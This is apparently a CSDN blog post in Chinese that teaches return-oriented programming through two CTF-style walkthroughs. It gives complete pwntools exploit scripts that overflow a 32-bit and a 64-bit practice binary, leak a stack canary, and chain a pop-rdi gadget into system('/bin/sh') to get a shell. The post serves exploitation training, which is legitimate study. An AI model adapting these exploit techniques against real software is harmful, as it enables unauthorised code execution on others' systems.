rop链攻击实例

最新推荐文章于 2024-09-14 07:21:26 发布
最新推荐文章于 2024-09-14 07:21:26 发布
阅读量1k 收藏 4
点赞数 1
文章标签: 网络 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dszfzzm/article/details/128237811
版权

rop链攻击原理

  • 在机器级编程中,调用函数的过程为:
    先从主函数跳转至被调用函数,此时栈空间中会保存被调用函数的临时变量,栈顶为返回地址,其下是传入该函数的参数。在被调用函数执行完毕后,会清理自己所使用的栈空间并返回之前的位值。因此被调用函数通常以ret指令结尾。
  • 而rop链即是基于以上原理,依靠ret指令获取程序控制权,从而达到一定的目的。

构造rop链的实例1(32位)

  • 首先checksec在这里插入图片描述
    发现只开启了nx保护
  • 静态分析在这里插入图片描述
    主函数中已调用system函数
    在这里插入图片描述
    vuln函数中存在栈溢出漏洞
    在这里插入图片描述
    偏移为32
  • 开始构造rop链
    • 在ida中查找所需的call system指令的地址
      在这里插入图片描述
    • 查找所需的‘/bin/sh’字段
      在这里插入图片描述
      因此可得exp
from pwn import *

r=process('./pwn')
system_addr=0x080491E7
binsh_addr=0x0804C024
offect=32
payload=(offect*'a').encode()+p32(system_addr)+p32(binsh_addr)
r.send(payload)
r.interactive()

构造rop链的实例2(64位)

  • checksec
    在这里插入图片描述
    发现存在canary 在这里插入图片描述
    存在于偏移为0x28处

  • 因此第一步先要泄露canary,然后进行溢出getshell

  • 接下来开始静态分析,寻找可以使用的函数和地址
    在这里插入图片描述
    存在两个read函数和一个printf函数,恰好可以完成泄露-溢出的操作。
    在这里插入图片描述
    在main函数中找到call _system指令
    在这里插入图片描述
    search找到/bin/sh字段
    由于这是64位程序,在调用函数时前6个参数保存在寄存器上,所以当我们需要将"/bin/sh"这个函数传给system的话,还需要获得一个寄存器的地址。
    利用ROPgadget工具
    在这里插入图片描述

  • 此时我们已经获取所需的所有信息,接下来开始编写exp

    from pwn import *
p=process('./pwn')
system_addr=0x0000000000401284
binsh_addr=0x0000000000404058
poprdi=0x00000000004011de
offset=0x28
leak_canary=(0x28-0x1)*'a'+'b'
p.sendlineafter("Go Go Go!!!",leak_canary)
p.recvuntil("ab")
canary=u64(p.recv(8))-0xa
print(hex(canary))

首先进行canary的泄露

这里需要注意的是如果利用sendline进行交互,会在输入的信息中加入’\n’,为了防止报错要将传入字段的长度减一。并且这个’\n’会将canary最后一位’\00’覆盖,因此要在得到的canary上再减去’\n’即0xa。

  • 此时得到了canary的值之后便开始进行溢出
    在这里插入图片描述

如图,由于数组s总长为0x38,减去canary前的0x28及canary本身的0x8,还需补充0x8个字符才能覆盖到返回地址

因此编写payload如下

payload=(offset*'a').encode()+p64(canary)+(0x8*'a').encode()+p64(poprdi)+p64(binsh_addr)+p64(system_addr)
  • 由此我们便可得到完整exp如下
from pwn import *
p=process('./pwn')
system_addr=0x0000000000401284
binsh_addr=0x0000000000404058
poprdi=0x00000000004011de
offset=0x28
leak_canary=(0x28-0x1)*'a'+'b'
p.sendlineafter("Go Go Go!!!",leak_canary)
p.recvuntil("ab")
canary=u64(p.recv(8))-0xa
print(hex(canary))
payload=(offset*'a').encode()+p64(canary)+(0x8*'a').encode()+p64(poprdi)+p64(binsh_addr)+p64(system_addr)
p.sendline(payload)
p.interactive()
  • 总结
    32位rop和64位rop在思路上高度一致,区别在于二者参数传递的方式,32位直接利用栈传参,而64位会优先利用寄存器传参。
    而rop栈溢出的思路也很单一,寻找溢出点,覆盖到返回地址,运行shellcode。
    但是这类题目在设置上可以做到很多样化,利用漏洞的不同,保护方式的不同,都可导致解题思路的变化。
dszfzzm
关注
针对Android上的ROP攻击剖析
简行之旅
11-01 1万+
引言        ROP(Return-oriented programming),即“返回导向编程技术”。其核心思想是在整个进程空间内现存的函数中寻找适合指令片断(gadget),并通过精心设计返回堆栈把各个gadget拼接起来,从而达到恶意攻击的目的。构造ROP攻击的难点在于,我们需要在整个进程空间中搜索我们需要的gadgets,这需要花费相当长的时间。但一旦完成了“搜索”和“拼接”,这样
linux内核rop姿势详解,[原创]rop攻击原理与思路(x86/x64)
weixin_36025176的博客
05-02 1242
rop的基础原理rop是Return Oriented Programming(面向返回的编程)的缩写;根据函数调用规则,当刚跳转到其它函数去执行时,从被调用者的视角看:栈顶是返回地址,紧接着是自己的参数(X86架构下);然后,被调用者会对栈空间进行一系列操作,保存寄存器和存储临时变量,但在即将退出时会清理自己消耗的栈空间,以使其回到自己被调用前的栈空间,保持栈平衡;最后,被调用者以ret指令结...
PWN基础之构造ROP(基本ROP
qq_53058639的博客
04-12 1267
​随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。**所谓 gadgets 就是以 ret结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
Ropper:强大的ROP构建工具
最新发布
gitblog_00439的博客
09-14 1105
Ropper:强大的ROP构建工具 Ropper Display information about files in different file formats and find gadgets to build rop chains for different architectures (x86/x86_64,...
ROP例子
fa1c4的blog
02-07 443
下面来举一个简单的ROP攻击技术的例子 #include<stdio.h> #include<unistd.h> #include<dlfcn.h> void vuln_func(){ char buf[128]; read(STDIN_FILENO, buf, 256); } int main(int argc, char *argv[]){ void *handle = dlopen("libc.so.6", RTLD_NOW | RTLD_
【pwn】基础ROP攻击实战:ret2libc3
ethan18的博客
07-10 413
这里用来记录一下关于PWN中ROP攻击的各种过程和经验ROP攻击是针对那些使用了NX防护的程序,开启NX防护的程序使得栈以及堆上的代码没有办法被执行,导致不能单独将函数栈中的返回地址修改到函数帧中。ROP主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。讲起来还是很抽象,我的理解就是利用了函数帧中的返回地址,以及具有gadgets(也就是带着ret指令的一段汇编语句)都算是ROP攻击。这里我挑一个最经典的ROP作为实战。
BROP攻击实例
u010796610的专栏
02-28 1421
转载于:http://ytliu.info/blog/2014/06/01/blind-return-oriented-programming-brop-attack-er/ Following the 1st session, which talked about the principle of BROP attack, this page will discuss about ho
ROP攻击实例解析:从入门到精通
ROP攻击利用了栈溢出等漏洞,在已有程序代码中寻找可利用的代码片段(gadgets),并通过构建一个ROP(Return-Oriented Programming Chain)来执行恶意代码。由于ROP攻击不需要直接注入恶意代码,因此可以绕过现代...
ROP攻击实例剖析:从零开始的全面讲解
# 第一章:ROP攻击简介 ## 1.1 ROP攻击的定义和原理 ## 1.2 ROP攻击的危害和实际应用场景 ## 第二章:ROP攻击的基础知识 ...在进行ROP攻击时,通常会使用Shellcode和ROP。Shellcode是一段精心构造的恶意代
ROP利用的防护绕过策略
理解ROP攻击 ## 1.1 ROP攻击的基本原理 ROP(Return-Oriented Programming)攻击是一种利用已加载到内存中的代码片段来构造恶意代码执行路径的攻击手法。攻击者通过利用程序中已存在的代码段(称为gadget)...
ROP原理与实战应用
ROP作为一种高级的内存攻击技术,在计算机安全领域引起了广泛关注。本章将深入探讨ROP的起源及相关背景知识。 ## 1.1 ROP的概念 ROP全称为Return-Oriented Programming,是一种利用程序已有代码段(即...
Linux使用ROP进行栈溢出攻击
stonesharp的专栏
08-06 3212
过Protostar stack6演示LinuxROP的简单使用,ROP就是所谓的Return Orientated Programming,早期也叫ret2libc,关于ROP的介绍可以看早期的文章《CVE2012-1889 Exploit编写(三)》,思路是一样的,只是平台换到了Linux下而已。 0×01. __builtin_return_address函数 先介绍下__bu
使用ROP攻击技术
热门推荐
海枫的专栏
09-28 3万+
随着64系统广泛应用,原来通过栈控制函数参数的方法已不再适用了,攻击提出ROP攻击,又展开了一场新的较量。
使用ROP攻击利用栈溢出漏洞
panfengblog
04-12 1548
使用ROP攻击利用栈溢出漏洞 环境:ubuntu16.04, gcc, python2.7 说明:为了成功实现Return2LibC攻击,这里关闭了可执行栈、关闭了StackGuard、关闭了地址随机化,终极目标是执行 system("/bin/sh") ⭐️⭐️注意⭐️⭐️:这是承接上一篇文章使用Return2LibC利用栈溢出漏洞的,栈溢出漏洞程序和上一篇相同 1. 安装ROPgadget 对于ubuntu16.04,默认安装了python2,只需要安装pip即可,然后再安装ROPgadget依赖c
20145236《网络对抗》进阶实验——64位Ubuntu 17.10.1 ROP攻击
weixin_30276935的博客
03-25 267
20145236《网络对抗》进阶实验——64位Ubuntu 17.10.1 ROP攻击 基础知识 ROP攻击 ROP全称为Retrun-oriented Programmming(面向返回的编程)是一种新型的基于代码复用技术的攻击攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 ROP攻击同缓冲区溢出攻击,格式化字符串漏洞攻击不同,是一种全新的攻击方式,它利用代码复用技术。 ROP的...
什么是ROP系统攻击
WH的博客
12-17 3377
文章目录ROP系统攻击初步了解寄存器内存管理常见汇编指令再究ROP攻击 ROP系统攻击初步了解 ROP全称为Return-oriented Programming(面向返回的编程)是一种新型的基于代码复用技术的攻击攻击者从已有的库或可执行文件中提取指令片段,构成恶意代码。 ROP的核心思想 (1)攻击者扫描已有的动态接库和可执行文件,提取出可以利用的指令片段(gadget),这些指令片段均以ret指令结尾,即用ret指令实现指令片段执行流的衔接。 (2)操作系统通过栈来进行函数的调用和返回。函数
计算机系统:Return Oriented Programming(ROP)详解——颠覆传统的攻击方式
m0_72410588的博客
08-31 1201
在计算机领域,随着技术的不断发展,攻击者也在探索新的方式来突破系统的安全防线。其中一种被广泛讨论的攻击方式就是"Return Oriented Programming"(ROP,返回导向编程)。本文将深入探讨ROP的原理、应用以及对计算机系统安全的影响。
栈溢出漏洞利用一,详解基本ROP,构造rop条实现攻击(pwn入门)
2402_83422357的博客
05-29 1222
基本ROP攻击手法的话其实还有一个最常用的,比赛经常出现的,也就是打syscall的ROP攻击没有提到,下次有时间讲下打syscall的攻击手法,但是只有先把上面的两个ROP攻击手法会懂了,尤其是ret2shellcode,才能够有可能真正理解syscall的ROP攻击,其实我自己对于ret2shellcode也仅仅是学了个入门而已,还有很多不懂的,还在学习ing.参考文章:CTF Wiki。
ROP攻击技术详解:利用内存指令Linux漏洞利用方法
然而,在ROP中,攻击者不再依赖于直接调用函数,而是寻找程序中已经存在的、较小的指令序列(通常称为" gadget",意指可重用的代码片段),这些序列可以组合起来形成攻击所需的复杂操作。由于这些指令通常位于堆或...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值